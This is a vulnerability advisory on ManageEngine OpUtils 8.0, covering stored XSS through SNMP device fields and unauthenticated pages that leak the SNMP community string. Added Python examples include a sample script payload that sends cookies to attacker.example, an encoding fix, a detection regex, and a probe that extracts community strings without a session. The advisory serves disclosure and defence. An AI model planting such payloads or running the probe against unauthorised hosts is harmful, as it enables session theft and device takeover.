ManageEngine OpUtils is an enterprise switch port and IP address management system. Rapid7's Deral Heiland discovered a persistent cross-site scripting (XSS) vulnerability, as well as a number of insecure direct object references. The vendor and CERT have been notified of these issues. The version tested was OpUtils 8.0, which was the most recent version at the time of initial disclosure. As of today, the current version offered by ManageEngine is OpUtils 12.0.
R7-2016-02.1: Multiple Persistent XSS Vulnerabilities
Script injected into a monitored device's SNMP sysDescr and sysLocation values is stored by OpUtils and triggers when those values are viewed within IP History, as shown in Figure 2 and Figure 3.
Figure 2: sysDescr injected XSS
Figure 3: sysLocation injected XSS
In addition, payloads in sysDescr, sysLocation, and sysName trigger when viewed within device history, as shown in Figure 4.
Figure 4: sysName injected XSS
Figure 5: XSS Via SNMP Trap Injection
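The mechanism behind R7-2016-02.1 is that SNMP system-group strings, which any device the poller talks to can set, are written into the page without encoding. The following is an added example (not code from the advisory or from OpUtils) that renders a constructed device record both the vulnerable way and with output encoding, and includes a poller-side check that flags stored SNMP values containing active markup. The device record, its field names and the row template are assumptions for illustration.

```python
"""Added example: persistent XSS from SNMP sysDescr/sysLocation/sysName
values rendered without encoding, and the hardened rendering.
Not code from the advisory or from OpUtils; the record and template are
assumptions."""
import html
import re

# Constructed sample of what a poller might store for a device whose SNMP
# agent returns attacker-controlled system-group values.
SAMPLE_DEVICE = {
    "ip": "192.0.2.10",
    "sysName": "core-sw01",
    "sysDescr": 'Cisco IOS<script>document.location="http://attacker.example/?c="+document.cookie</script>',
    "sysLocation": 'Rack 4" onmouseover="alert(1)',
}

# Assumed template: one value lands in text context, one also in an attribute.
ROW_TEMPLATE = ('<tr><td>{ip}</td><td>{sysName}</td><td>{sysDescr}</td>'
                '<td title="{sysLocation}">{sysLocation}</td></tr>')


def render_row_vulnerable(device):
    """Raw interpolation: whatever the SNMP agent returned becomes markup."""
    return ROW_TEMPLATE.format(**device)


def render_row_hardened(device):
    """HTML-encode every SNMP-sourced value before interpolation.
    quote=True also encodes ' and ", which is what keeps sysLocation from
    breaking out of the title attribute."""
    safe = {k: html.escape(str(v), quote=True) for k, v in device.items()}
    return ROW_TEMPLATE.format(**safe)


# Markup that would execute if a stored value were rendered raw.
ACTIVE_MARKUP = re.compile(
    r'<\s*script|<\s*/?\s*(?:iframe|object|embed|svg)|\bon\w+\s*=|javascript\s*:',
    re.IGNORECASE)


def flag_suspicious_snmp_values(device):
    """Names the sys* fields whose stored value carries active markup.
    A poller can raise an alert on this instead of trusting the device."""
    return [k for k, v in device.items()
            if k.startswith("sys") and ACTIVE_MARKUP.search(str(v))]


if __name__ == "__main__":
    print(render_row_vulnerable(SAMPLE_DEVICE))
    print(render_row_hardened(SAMPLE_DEVICE))
    print("suspicious fields:", flag_suspicious_snmp_values(SAMPLE_DEVICE))
```

The encoding step must match the context the value is written into: the escaping above is correct for element text and quoted attributes, but a value dropped into a script block or a URL needs JavaScript or URL encoding instead. The poller-side check is a detection aid, not a substitute for encoding at render time.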
R7-2016-02.2: Multiple Insecure Direct Object References
During testing, it was discovered that URLs ending in .cc are accessible without proper authentication, which allowed retrieval of a portion of the web page. The following URLs are able to be accessed without authentication:
As a result of this direct access without authentication, an attacker is able to retrieve the HTML of the page "SystemExplorer.cc". That HTML contains the product's configured SNMP community string in clear text, as shown in Figure 6. With that string, an attacker can query every device that OpUtils polls with it and, if it is a read-write community, reconfigure them.
Figure 6: Information leakage via Insecure Direct Object Reference
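A practitioner confirming R7-2016-02.2 on a host they are authorized to test wants to see whether a .cc page answers with content when no session is presented, and whether that content carries a community string. The following is an added example, not code from the advisory: it fetches each path with no cookies and redirects disabled, then classifies the response. Only SystemExplorer.cc is named in the advisory; the login-form and community-string patterns, and any further paths passed in, are assumptions to be checked against the target.

```python
"""Added example: unauthenticated probe for .cc pages and a classifier for
what came back. Not code from the advisory; the detection patterns are
assumptions about what a leaked community string looks like in the HTML."""
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin

# The only path the advisory names; extend with paths you have verified.
DEFAULT_PATHS = ["SystemExplorer.cc"]

# Assumed shapes: a login form, and a community string as a form value or
# "label: value" text.
LOGIN_FORM = re.compile(r'<form[^>]*login|name=["\']j_password', re.IGNORECASE)
COMMUNITY = re.compile(
    r'(?:community|snmp)[^<>\n]{0,40}?(?:value=|:)\s*["\']?([^"\'<>\s]+)',
    re.IGNORECASE)


def extract_community_candidates(body):
    """Values that sit next to a 'community'/'snmp' label in the HTML."""
    return COMMUNITY.findall(body)


def classify_response(status, headers, body):
    """Classify one response. headers is a dict; lookup is case-insensitive."""
    location = next((v for k, v in headers.items() if k.lower() == "location"), "")
    if status in (301, 302, 303, 307, 308) and "login" in location.lower():
        return "redirected-to-login"
    if status in (401, 403):
        return "denied"
    if status == 200:
        if LOGIN_FORM.search(body):
            return "login-form"
        if extract_community_candidates(body):
            return "exposed-with-community-string"
        return "exposed"
    return f"other-{status}"


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface redirects as HTTPError so a bounce to login is visible."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url, paths=DEFAULT_PATHS, timeout=10):
    """Request each path with no session and classify the answer."""
    opener = urllib.request.build_opener(NoRedirect())
    results = {}
    for path in paths:
        req = urllib.request.Request(urljoin(base_url, path),
                                     headers={"User-Agent": "cc-probe"})
        try:
            with opener.open(req, timeout=timeout) as resp:
                body = resp.read(200_000).decode("utf-8", "replace")
                results[path] = classify_response(resp.status, dict(resp.headers), body)
        except urllib.error.HTTPError as e:
            body = e.read().decode("utf-8", "replace")
            results[path] = classify_response(e.code, dict(e.headers), body)
        except (urllib.error.URLError, OSError) as e:
            results[path] = f"error-{e}"
    return results


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:7080/"))
```

Anything other than "redirected-to-login", "login-form" or "denied" means the page is reachable without a session; "exposed-with-community-string" is the R7-2016-02.2 condition and the extracted value should be rotated on every device that shares it.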
Disclosure Timeline
Thu, Jan 14, 2016: Issues discovered by Deral Heiland of Rapid7, Inc.
Fri, Jan 15, 2016: Initial contact to vendor
Mon, Feb 15, 2016: Details disclosed to CERT, tracked as VU#400736
Wed, Mar 9, 2016: Clarification requested by the vendor, via CERT
Thu, Mar 17, 2016: Public disclosure of R7-2016-02